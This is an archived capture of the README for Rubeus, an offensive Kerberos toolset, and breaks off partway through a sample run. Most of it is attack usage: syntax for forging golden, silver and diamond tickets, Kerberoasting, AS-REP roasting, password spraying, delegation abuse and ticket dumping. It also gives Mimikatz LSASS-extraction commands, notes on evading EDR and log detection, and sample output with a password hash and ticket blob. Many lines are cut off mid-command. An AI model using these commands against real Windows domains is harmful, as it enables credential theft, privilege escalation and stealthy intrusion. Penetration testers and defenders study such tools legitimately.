{
	"id": "97da071e-029f-411a-986f-4b59ea2566f3",
	"created_at": "2026-04-06T00:21:54.652093Z",
	"updated_at": "2026-04-10T03:22:13.860296Z",
	"deleted_at": null,
	"sha1_hash": "247dc916edbfc235152ec68294b5afea53f9b147",
	"title": "GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 620821,
	"plain_text": "GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.\r\nBy 0xe7\r\nArchived: 2026-04-05 14:03:43 UTC\r\nRubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's\r\nKekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0\r\nlicense). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization-without their prior work this project would not exist.\r\nCharlie Clark and Ceri Coburn have both made significant contributions as co-developers to the Rubeus codebase.\r\nElad Shamir contributed some essential work for resource-based constrained delegation. Their work is very\r\nappreciated!\r\nRubeus also uses a C# ASN.1 parsing/encoding library from Thomas Pornin named DDer that was released with\r\nan \"MIT-like\" license. Huge thanks to Thomas for his clean and stable code!\r\nPKINIT code heavily adapted from @SteveSyfuhs's Bruce tool. Bruce made RFC4556 (PKINIT) a lot easier to\r\nunderstand. Huge thanks to Steve!\r\nNDR encoding and decoding for Kerberos PAC is based on the NtApiDotNet library from @tiraniddo, thank you\r\nJames.\r\nThe KerberosRequestorSecurityToken.GetRequest method for Kerberoasting was contributed to PowerView (and\r\nthen incorporated into Rubeus) by @machosec.\r\n@harmj0y is the primary author of this code base.\r\nRubeus is licensed under the BSD 3-Clause license.\r\nTable of Contents\r\nRubeus\r\nTable of Contents\r\nBackground\r\nCommand Line Usage\r\nOpsec Notes\r\nOverview\r\nWeaponization\r\nExample: Credential Extraction\r\nExample: Over-pass-the-hash\r\nTicket requests and renewals\r\nasktgt\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 1 of 100\n\nasktgs\r\nrenew\r\nbrute|spray\r\nConstrained delegation abuse\r\ns4u\r\nTicket Forgery\r\ngolden\r\nsilver\r\ndiamond\r\nTicket Management\r\nptt\r\npurge\r\ndescribe\r\nTicket Extraction and Harvesting\r\ntriage\r\nklist\r\ndump\r\ntgtdeleg\r\nmonitor\r\nharvest\r\nRoasting\r\nkerberoast\r\nkerberoasting opsec\r\nExamples\r\nasreproast\r\nMiscellaneous\r\ncreatenetonly\r\nchangepw\r\nhash\r\ntgssub\r\ncurrentluid\r\nlogonsession\r\nasrep2kirbi\r\nkirbi\r\nCompile Instructions\r\nTargeting other .NET versions\r\nSidenote: Building Rubeus as a Library\r\nSidenote: Running Rubeus Through PowerShell\r\nSidenote Sidenote: Running Rubeus Over PSRemoting\r\nBackground\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 2 of 100\n\nCommand Line Usage\r\n ______ _\r\n (_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n | __ /| | | | _ \\| ___ | | | |/___)\r\n | | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n |_| |_|____/|____/|_____)____/(___/\r\n v2.3.3\r\n Ticket requests and renewals:\r\n Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon s\r\n Rubeus.exe asktgt /user:USER \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HAS\r\n Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon s\r\n Rubeus.exe asktgt /user:USER \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HAS\r\n Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new p\r\n Rubeus.exe asktgt /user:USER \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HAS\r\n Retrieve a TGT using a PCKS12 certificate, start a /netonly process, and to apply the ticket to the new proc\r\n Rubeus.exe asktgt /user:USER /certificate:C:\\temp\\leaked.pfx \u003c/password:STOREPASSWORD\u003e /createnetonly:C:\r\n Retrieve a TGT using a certificate from the users keystore (Smartcard) specifying certificate thumbprint or\r\n Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\\Win\r\n Retrieve a TGT suitable for changing an account with an expired password using the changepw command\r\n Rubeus.exe asktgt /user:USER \u003c/password:PASSWORD /changepw [/enctype:DES|RC4|AES128|AES256] | /des:HASH\r\n Request a TGT without sending pre-auth data:\r\n Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid]\r\n Request a service ticket using an AS-REQ:\r\n Rubeus.exe asktgt /user:USER /service:SPN \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HA\r\n Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket:\r\n Rubeus.exe asktgs \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e \u003c/service:SPN1,SPN2,...\u003e [/enctype:DES|RC4|AES12\r\nRetrieve a service ticket using the Kerberos Key List Request options:\r\n Rubeus.exe asktgs /keyList /service:KRBTGT_SPN \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e [/enctype:DES|RC4|\r\nRetrieve a delegated managed service account ticket:\r\n Rubeus.exe asktgs /dmsa /opsec /service:KRBTGT_SPN /targetuser:DMSA_ACCOUNT$ \u003c/ticket:BASE64 | /ticket:\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 3 of 100\n\nRenew a TGT, optionally applying the ticket, saving it, or auto-renewing the ticket up to its renew-till lim\r\n Rubeus.exe renew \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt\r\n Perform a Kerberos-based password bruteforcing attack:\r\n Rubeus.exe brute \u003c/password:PASSWORD | /passwords:PASSWORDS_FILE\u003e [/user:USER | /users:USERS_FILE] [/dom\r\n Perform a scan for account that do not require pre-authentication:\r\n Rubeus.exe preauthscan /users:C:\\temp\\users.txt [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/proxyurl:http\r\n Constrained delegation abuse:\r\n Perform S4U constrained delegation abuse:\r\n Rubeus.exe s4u \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e \u003c/impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KI\r\n Rubeus.exe s4u /user:USER \u003c/rc4:HASH | /aes256:HASH\u003e [/domain:DOMAIN] \u003c/impersonateuser:USER | /tgs:BASE\r\n Perform S4U constrained delegation abuse across domains:\r\n Rubeus.exe s4u /user:USER \u003c/rc4:HASH | /aes256:HASH\u003e [/domain:DOMAIN] \u003c/impersonateuser:USER | /tgs:BASE\r\n Ticket Forgery:\r\n Forge a golden ticket using LDAP to gather the relevent information:\r\n Rubeus.exe golden \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e /ldap [/printcm\r\n Forge a golden ticket using LDAP to gather the relevent information but explicitly overriding some values:\r\n Rubeus.exe golden \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e /ldap [/dc:DOMA\r\n Forge a golden ticket, setting values explicitly:\r\n Rubeus.exe golden \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/domain:DOMAIN\r\n Forge a silver ticket using LDAP to gather the relevent information:\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a silver ticket using LDAP to gather the relevent information, using the KRBTGT key to calculate the K\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a silver ticket using LDAP to gather the relevent information but explicitly overriding some values:\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a silver ticket using LDAP to gather the relevent information and including an S4U Delegation Info PAC\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\n Forge a silver ticket using LDAP to gather the relevent information and setting a different cname and crealm\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 4 of 100\n\nForge a silver ticket, setting values explicitly:\r\n Rubeus.exe silver \u003c/des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH\u003e \u003c/user:USERNAME\u003e \u003c/service:SPN\u003e\r\nForge a diamond TGT by requesting a TGT based on a user password/hash:\r\nRubeus.exe diamond /user:USER \u003c/password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH\r\nForge a diamond TGT by requesting a TGT using a PCKS12 certificate:\r\nRubeus.exe diamond /user:USER /certificate:C:\\temp\\leaked.pfx \u003c/password:STOREPASSWORD\u003e [/crea\r\nForge a diamond TGT by requesting a TGT using tgtdeleg:\r\nRubeus.exe diamond /tgtdeleg [/createnetonly:C:\\Windows\\System32\\cmd.exe] [/outfile:FILENAME]\r\n Ticket management:\r\n Submit a TGT, optionally targeting a specific LUID (if elevated):\r\n Rubeus.exe ptt \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e [/luid:LOGINID]\r\n Purge tickets from the current logon session, optionally targeting a specific LUID (if elevated):\r\n Rubeus.exe purge [/luid:LOGINID]\r\n Parse and describe a ticket (service ticket or TGT):\r\n Rubeus.exe describe \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e [/servicekey:HASH] [/krbkey:HASH] [/asrepkey:H\r\n Ticket extraction and harvesting:\r\n Triage all current tickets (if elevated, list for all users), optionally targeting a specific LUID, username\r\n Rubeus.exe triage [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]\r\n List all current tickets in detail (if elevated, list for all users), optionally targeting a specific LUID:\r\n Rubeus.exe klist [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]\r\n Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific service/LUID\r\n Rubeus.exe dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap]\r\n Retrieve a usable TGT .kirbi for the current user (w/ session key) without elevation by abusing the Kerberos\r\n Rubeus.exe tgtdeleg [/target:SPN]\r\n Monitor every /interval SECONDS (default 60) for new TGTs:\r\n Rubeus.exe monitor [/interval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SE\r\n Monitor every /monitorinterval SECONDS (default 60) for new TGTs, auto-renew TGTs, and display the working c\r\n Rubeus.exe harvest [/monitorinterval:SECONDS] [/displayinterval:SECONDS] [/targetuser:USER] [/nowrap] [/\r\n Roasting:\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 5 of 100\n\nPerform Kerberoasting:\r\n Rubeus.exe kerberoast [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc\r\n Perform Kerberoasting, outputting hashes to a file:\r\n Rubeus.exe kerberoast /outfile:hashes.txt [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [\r\n Perform Kerberoasting, outputting hashes in the file output format, but to the console:\r\n Rubeus.exe kerberoast /simple [[/spn:\"blah/blah\"] | [/spns:C:\\temp\\spns.txt]] [/user:USER] [/domain:DOMA\r\n Perform Kerberoasting with alternate credentials:\r\n Rubeus.exe kerberoast /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD [/spn:\"blah/blah\"] [/user:USER]\r\n Perform Kerberoasting with an existing TGT:\r\n Rubeus.exe kerberoast \u003c/spn:\"blah/blah\" | /spns:C:\\temp\\spns.txt\u003e \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e\r\n Perform Kerberoasting with an existing TGT using an enterprise principal:\r\n Rubeus.exe kerberoast \u003c/spn:user@domain.com | /spns:user1@domain.com,user2@domain.com\u003e /enterprise \u003c/tic\r\n Perform Kerberoasting with an existing TGT and automatically retry with the enterprise principal if any fail\r\n Rubeus.exe kerberoast \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e /autoenterprise [/ldaps] [/nowrap]\r\n Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts:\r\n Rubeus.exe kerberoast /usetgtdeleg [/ldaps] [/nowrap]\r\n Perform \"opsec\" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:\r\n Rubeus.exe kerberoast /rc4opsec [/ldaps] [/nowrap]\r\n List statistics about found Kerberoastable accounts without actually sending ticket requests:\r\n Rubeus.exe kerberoast /stats [/ldaps] [/nowrap]\r\n Perform Kerberoasting, requesting tickets only for accounts with an admin count of 1 (custom LDAP filter):\r\n Rubeus.exe kerberoast /ldapfilter:'admincount=1' [/ldaps] [/nowrap]\r\n Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 a\r\n Rubeus.exe kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/ldaps] [/nowrap]\r\n Perform Kerberoasting, with a delay of 5000 milliseconds and a jitter of 30%:\r\n Rubeus.exe kerberoast /delay:5000 /jitter:30 [/ldaps] [/nowrap]\r\n Perform AES Kerberoasting:\r\n Rubeus.exe kerberoast /aes [/ldaps] [/nowrap]\r\n Perform Kerberoasting using an account without pre-auth by sending AS-REQ's:\r\n Rubeus.exe kerberoast \u003c/spn:\"\"blah/blah\"\" | /spns:C:\\temp\\spns.txt\u003e /nopreauth:USER /domain:DOMAIN [/dc:\r\n Perform AS-REP \"roasting\" for any users without preauth:\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 6 of 100\n\nRubeus.exe asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:\"OU=,...\"] [/ldaps] [/d\r\n Perform AS-REP \"roasting\" for any users without preauth, outputting Hashcat format to a file:\r\n Rubeus.exe asreproast /outfile:hashes.txt /format:hashcat [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONT\r\n Perform AS-REP \"roasting\" for any users without preauth using alternate credentials:\r\n Rubeus.exe asreproast /creduser:DOMAIN.FQDN\\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/\r\n Miscellaneous:\r\n Create a hidden program (unless /show is passed) with random /netonly credentials, displaying the PID and LU\r\n Rubeus.exe createnetonly /program:\"C:\\Windows\\System32\\cmd.exe\" [/show] [/ticket:BASE64 | /ticket:FILE.K\r\n Reset a user's password from a supplied TGT (AoratoPw):\r\n Rubeus.exe changepw \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e /new:PASSWORD [/dc:DOMAIN_CONTROLLER] [/target\r\n Calculate rc4_hmac, aes128_cts_hmac_sha1, aes256_cts_hmac_sha1, and des_cbc_md5 hashes:\r\n Rubeus.exe hash /password:X [/user:USER] [/domain:DOMAIN]\r\n Substitute an sname or SPN into an existing service ticket:\r\n Rubeus.exe tgssub \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e /altservice:ldap [/srealm:DOMAIN] [/ptt] [/luid]\r\n Rubeus.exe tgssub \u003c/ticket:BASE64 | /ticket:FILE.KIRBI\u003e /altservice:cifs/computer.domain.com [/srealm:DO\r\n Display the current user's LUID:\r\n Rubeus.exe currentluid\r\n Display information about the (current) or (target) logon session, default all readable:\r\n Rubeus.exe logonsession [/current] [/luid:X]\r\n The \"/consoleoutfile:C:\\FILE.txt\" argument redirects all console output to the file specified.\r\n The \"/nowrap\" flag prevents any base64 ticket blobs from being column wrapped for any function.\r\n The \"/debug\" flag outputs ASN.1 debugging information.\r\n Convert an AS-REP and a key to a Kirbi:\r\n Rubeus.exe asrep2kirbi /asrep:\u003cBASE64 | FILEPATH\u003e \u003c/key:BASE64 | /keyhex:HEXSTRING\u003e [/enctype:DES|RC4|AE\r\n Insert new DES session key into a Kirbi:\r\n Rubeus.exe kirbi /kirbi:\u003cBASE64 | FILEPATH\u003e /sessionkey:SESSIONKEY /sessionetype:DES|RC4|AES128|AES256 [\r\n NOTE: Base64 ticket blobs can be decoded with :\r\n [IO.File]::WriteAllBytes(\"ticket.kirbi\", [Convert]::FromBase64String(\"aa...\"))\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 7 of 100\n\nOpsec Notes\r\nThis section covers some notes on the operational security of using Rubeus in an environment, with some\r\ntechnical examples comparing/contrasting some of its approaches to Mimikatz. The material here will be\r\nexpanded in the future.\r\nOverview\r\nAny action you perform on a system is a detectable risk, especially when abusing functionality in\r\n\"weird\"/unintended ways. Rubeus (like any attacker toolset) can be detected in a number of methods, either from\r\nthe host, network, or domain perspectives. I have a workmate who is fond of stating \"everything is stealthy until\r\nsomeone is looking for it\" - tools and techniques generally evade detection because either a) people are not\r\nsufficiently aware of the tool/technique and therefore not even looking, b) people can not collect and process the\r\ndata needed at the appropriate scale, or c) the tool/technique blends with existing behavior to sufficiently sneak in\r\nwith false positives in an environment. There is much more information on these steps and detection subversion in\r\ngeneral in Matt Graeber and Lee Christensen’s Black Hat USA 2018 “Subverting Sysmon” talk and associated\r\nwhitepaper.\r\nFrom the host perspective, Rubeus can be caught during initial weaponization of the code itself, by an abnormal\r\n(non-lsass.exe) process issuing raw Kerberos port 88 traffic, through the use of sensitive APIs like\r\nLsaCallAuthenticationPackage(), or by abnormal tickets being present on the host (e.g. rc4_hmac use in tickets in\r\na modern environment).\r\nFrom a network or domain controller log perspective, since Rubeus implements many parts of the normal\r\nKerberos protocol, the main detection method involves the use of rc4_hmac in Kerberos exchanges. Modern\r\nWindows domains (functional level 2008 and above) use AES encryption by default in normal Kerberos\r\nexchanges (with a few exceptions like inter-realm trust tickets). Using a rc4_hmac (NTLM) hash is used in a\r\nKerberos exchange instead of a aes256_cts_hmac_sha1 (or aes128) key results in some signal that is detectable at\r\nthe host level, network level (if Kerberos traffic is parsed), and domain controller event log level, sometimes\r\nknown as \"encryption downgrade\".\r\nWeaponization\r\nOne common way attack tools are detected is through the weaponization vector for the code. If Rubeus is run\r\nthrough PowerShell (this includes Empire) the standard PowerShell V5 protections all apply (deep script block\r\nlogging, AMSI, etc.). If Rubeus is executed as a binary on disk, standard AV signature detection comes into play\r\n(part of why we do not release compiled versions of Rubeus, as brittle signatures are silly ; ). If Rubeus is used as\r\na library then it's susceptible to whatever method the primary tool uses to get running. And if Rubeus is run\r\nthrough unmanaged assembly execution (like Cobalt Strike's execute_assembly ) cross-process code injection is\r\nperformed and the CLR is loaded into a potentially non-.NET process, though this signal is present for the\r\nexecution of any .NET code using this method.\r\nAlso, AMSI (the Antimalware Scan Interface) has been added to .NET 4.8. Ryan Cobb has additional details on\r\nthe offensive implications of this in the Defense section of his “Entering a Covenant: .NET Command and\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 8 of 100\n\nControl” post.\r\nExample: Credential Extraction\r\nSay we have elevated access on a machine and want to extract user credentials for reuse.\r\nMimikatz is the swiss army knife of credential extraction, with multiple options. The sekurlsa::logonpasswords\r\ncommand will open up a read handle to LSASS, enumerate logon sessions present on the system, walk the default\r\nauthentication packages for each logon session, and extract any reverseable password/credential material present.\r\nSidenote: the sekurlsa::ekeys command will enumerate ALL key types present for the Kerberos package.\r\nRubeus doesn't have any code to touch LSASS (and none is intended), so its functionality is limited to extracting\r\nKerberos tickets through use of the LsaCallAuthenticationPackage() API. From a non-elevated standpoint, the\r\nsession keys for TGTs are not returned (by default) so only service tickets extracted will be usable (the tgtdeleg\r\ncommand uses a Kekeo trick to get a usable TGT for the current user). If in a high-integrity context, a GetSystem\r\nequivalent utilizing token duplication is run to elevate to SYSTEM, and a fake logon application is registered with\r\nthe LsaRegisterLogonProcess() API call. This allows for privileged enumeration and extraction of all tickets\r\ncurrently registered with LSA on the system, resulting in base64 encoded .kirbi's being output for later reuse.\r\nMimikatz can perform the same base64 .kirbi extraction with the following series of commands:\r\nmimikatz # privilege::debug\r\nmimikatz # token::elevate\r\nmimikatz # standard::base64 /output:true\r\nmimikatz # kerberos::list /export\r\nMimikatz can also carve tickets directly out of LSASS' memory with:\r\nmimikatz # privilege::debug\r\nmimikatz # standard::base64 /output:true\r\nmimikatz # sekurlsa::tickets /export\r\nAs \"everything is stealthy until someone is looking for it\", it's arguable whether LSASS manipulation or ticket\r\nextraction via the LsaCallAuthenticationPackage() API call is more \"stealthy\". Due to Mimikatz' popularity,\r\nopening up a handle to LSASS and reading/writing its memory has become a big target for EDR detection and/or\r\nprevention. However, LsaCallAuthenticationPackage() is used by a fairly limited set of processes, and creating a\r\nfake logon application with LsaRegisterLogonProcess() is also fairly anomalous behavior. However full API level\r\nintrospection and baselining appears to be a more difficult technical problem than LSASS protection.\r\nExample: Over-pass-the-hash\r\nSay we recover a user's rc4_hmac hash (NTLM) and want to reuse this credential to compromise an additional\r\nmachine where the user account has privileged access.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 9 of 100\n\nSidenote: pass-the-hash != over-pass-the-hash. The traditional pass-the-hash technique involves reusing a hash\r\nthrough the NTLMv1/NTLMv2 protocol, which doesn't touch Kerberos at all. The over-pass-the-hash approach\r\nwas developed by Benjamin Delpy and Skip Duckwall (see their \"Abusing Microsoft Kerberos - Sorry you guys\r\ndon't get it\" presentation for more information). This approach turns a hash/key (rc4_hmac,\r\naes256_cts_hmac_sha1, etc.) for a domain-joined user into a fully-fledged ticket-granting-ticket (TGT).\r\nLet's compare \"over-passing-the-hash\" via Mimikatz' sekurlsa::pth command verus using the asktgt\r\ncommand from Rubeus (or Kekeo if you'd like).\r\nWhen sekurlsa::pth is used to over-pass-the-hash, Mimikatz first creates a new logon type 9 process with\r\ndummy credentials - this creates a new \"sacrificial\" logon session that doesn't interact with the current logon\r\nsession. It then opens the LSASS process with the ability to write to process memory, and the supplied hash/key is\r\nthen patched into the appropriate section for the associated logon session (in this case, the \"sacrificial\" logon\r\nsession that was started). This causes the normal Kerberos authentication process to kick off as normal as if the\r\nuser had normally logged on, turning the supplied hash into a fully-fledged TGT.\r\nWhen Rubeus' asktgt command is run (or Kekeo's equivalent), the raw Kerberos protocol is used to request a\r\nTGT, which is then applied to the current logon session if the /ptt flag is passed.\r\nWith the Mimikatz approach, administrative rights are needed as you are manipulating LSASS memory directly.\r\nAs previously mentioned, Mimikatz' popularity has also led to this type of behavior (opening up a handle to\r\nLSASS and reading/writing its memory) being a big target for EDR detection and/or prevention. With the\r\nRubeus/Kekeo approach, administrative rights are not needed as LSASS is not being touched. However, if the\r\nticket is applied to the current logon session (with /ptt ), the TGT for the current logon session will be\r\noverwritten. This behavior can be avoided (with administrative access) by using the /createnetonly command\r\nto create a sacrificial process/logon session, then using /ptt /ticket:X /luid:0xa.. with the newly created\r\nprocess LUID. If using Cobalt Strike, using the make_token command with dummy credentials and then\r\nkerberos_ticket_use with the ticket retrieved by Rubeus will let you apply the new TGT in a way that a) doesn't\r\nneed administrative rights and b) doesn't stomp on the current logon session TGT.\r\nIt is our opinion that the LSASS manipulation approach is more likely (at the current moment) to be detected or\r\nmitigated due to the popularity of the technique. However the Rubeus approach does result in another piece of\r\ndetectable behavior. Kerberos traffic to port 88 should normally only originate from lsass.exe - sending raw traffic\r\nof this type from an abnormal process could be detectable if the information can be gathered.\r\nSidenote: one way both approaches can potentially be caught is the previously mentioned \"encryption\r\ndowngrade\" detection. To retrieve AES keys, use Mimikatz' sekurlsa::ekeys module to return ALL Kerberos\r\nencryption keys (same with lsadump::dcsync ) which are better to use when trying to evade some detections.\r\nTicket requests and renewals\r\nBreakdown of the ticket request commands:\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 10 of 100\n\nCommand Description\r\nasktgt Request a ticket-granting-ticket (TGT) from a hash/key or password\r\nasktgs Request a service ticket from a passed TGT\r\nrenew Renew (or autorenew) a TGT or service ticket\r\nbrute\r\nPerform a Kerberos-based password bruteforcing attack. 'spray' can also be used instead of\r\n'brute'\r\npreauthscan Preform a scan for accounts that do not require Kerberos pre-authentication\r\nasktgt\r\nThe asktgt action will build raw AS-REQ (TGT request) traffic for the specified user and encryption key ( /rc4 ,\r\n/aes128 , /aes256 , or /des ). A /password flag can also be used instead of a hash - in this case /enctype:X\r\nwill default to RC4 for the exchange, with des|aes128|aes256 as options. If no /domain is specified, the\r\ncomputer's current domain is extracted, and if no /dc is specified the same is done for the system's current\r\ndomain controller. If authentication is successful, the resulting AS-REP is parsed and the KRB-CRED (a .kirbi,\r\nwhich includes the user's TGT) is output as a base64 blob. The /ptt flag will \"pass-the-ticket\" and apply the\r\nresulting Kerberos credential to the current logon session. The /luid:0xA.. flag will apply the ticket to the\r\nspecified logon session ID (elevation needed) instead of the current logon session.\r\nNote that no elevated privileges are needed on the host to request TGTs or apply them to the current logon\r\nsession, just the correct hash for the target user. Also, another opsec note: only one TGT can be applied at a time to\r\nthe current logon session, so the previous TGT is wiped when the new ticket is applied when using the /ptt\r\noption. A workaround is to use the /createnetonly:C:\\X.exe parameter (which hides the process by default\r\nunless the /show flag is specified), or request the ticket and apply it to another logon session with ptt\r\n/luid:0xA.. .\r\nBy default, several differences exists between AS-REQ's generated by Rubeus and genuine AS-REQ's. To form\r\nAS-REQ's more inline with genuine requests, the /opsec flag can be used, this will send an initial AS-REQ\r\nwithout pre-authentication first, if this succeeds, the resulting AS-REP is decrypted and TGT return, otherwise an\r\nAS-REQ with pre-authentication is then sent. As this flag is intended to make Rubeus traffic more stealthy, it\r\ncannot by default be used with any encryption type other than aes256 and will just throw a warning and exit if\r\nanother encryption type is used. To allow for other encryption types to be used with the /opsec changes, the\r\n/force flag exists.\r\nPKINIT authentication is supported with the /certificate:X argument. When the private key within the PFX\r\nfile is password protected, this password can be passed with the /password:X argument. When using PKINIT\r\nauthentication the /getcredentials flag can be used to automatically request a U2U service ticket and retrieve\r\nthe account NT hash.\r\nRequesting a TGT without a PAC can be done using the /nopac switch.\r\nhttps://github.com/GhostPack/Rubeus\r\nPage 11 of 100\n\nUsing a KDC proxy (MS-KKDCP) to make the request is possible using the /proxyurl:URL argument. The full\r\nURL for the KDC proxy is required, eg. https://kdcproxy.exmaple.com/kdcproxy\r\nThe /nopreauth flag can be used to send an AS-REQ without pre-authentication. The /service:SPN argument\r\ncan be used to request service tickets using AS-REQ's directly, it will take an SPN or a username.\r\nRequesting a ticket via RC4 hash for dfm.a@testlab.local, applying it to the current logon session:\r\nC:\\Rubeus\u003eRubeus.exe asktgt /user:dfm.a /rc4:2b576acbe6bcfda7294d6bd18041b8fe /ptt\r\n ______ _\r\n(_____ \\ | |\r\n _____) )_ _| |__ _____ _ _ ___\r\n| __ /| | | | _ \\| ___ | | | |/___)\r\n| | \\ \\| |_| | |_) ) ____| |_| |___ |\r\n|_| |_|____/|____/|_____)____/(___/\r\nv1.4.1\r\n[*] Action: Ask TGT\r\n[*] Using rc4_hmac hash: 2b576acbe6bcfda7294d6bd18041b8fe\r\n[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)\r\n[*] Building AS-REQ (w/ preauth) for: 'testlab.local\\dfm.a'\r\n[+] TGT request successful!\r\n[*] base64(ticket.kirbi):\r\n doIFmjCCBZagAwIBBaEDAgEWooIErzCCBKthggSnMIIEo6ADAgEFoQ8bDVRFU1RMQUIuTE9DQUyiIjAg\r\n oAMCAQKhGTAXGwZrcmJ0Z3QbDXRlc3RsYWIubG9jYWyjggRlMIIEYaADAgESoQMCAQKiggRTBIIETwrl\r\n zIpKjTT11eteJCn+0rtlKwtTW/8XvoWXy61rOCrOIo16YPiMe4usXoJaOqsvCydMgd6955hT+IoFMyGG\r\n VfVxetoM1Oa5aPA2sfzJeogn4RpFBoY5vjjKBzPaTJptPRX7Wjg0o1FTszJET4mhQyLKxQMgprKcc2mz\r\n yniQzGPI19O95aSoPpNar+4lKlyBsL4QjSEeBdZQ2/Ab1JVu3eh1xCsWkKUUlabbzeZwo8SG0QkZ0DKk\r\n qOD8hx5wbQ+w8emcLvHMIrmg1xO2OPngK76C3daeiS59UVADSz/n3H7Tfuk+EXSdZ8DC4/c8KIZvHsC6\r\n cO/ymVFxyuRJLg7VThl8keZmbWzYei6xAwH7mUAUEA1lk0pEHx12nAHcKILsbS3F9wAcHMNEGe/Xa3UK\r\n INJ0q+JvdJpCPo/wgyu7wjKgsdpgUV0siVfpGaxG7yh6s3U2tAlBWnWdGF/Gy/FkOk/hJxhTTHcHa5XE\r\n LTaXY9cnraee+llJqmOnHfjPa5+XNTnVtBZjT0SPRnSXfdPG5BgiXYlCjr5ykhF8MdVE1Se+WtEZJuPj\r\n lYrCtWo2oEjBbYMb3YGTcWh5+oWNY1QdxSpyFc8IDQOTOCnQ+nsQf78phU7svTBm0b5AqqPD/olz1RYm\r\n f4qR+90TcASaQGwHUQbpFnLb2U9BHwNS+SlRwafFT5qlTmXaqoQMMjknospm0+v0U8hd8KbZ4jwK2hM+\r\n vE74bOiAMdjTf5YLDorRyuFUoa7oIaJZTXxsLmqZsBCsUnH5etXTb9vHj7Dl27wyP9snRHIWuE8Rdo9Z\r\n 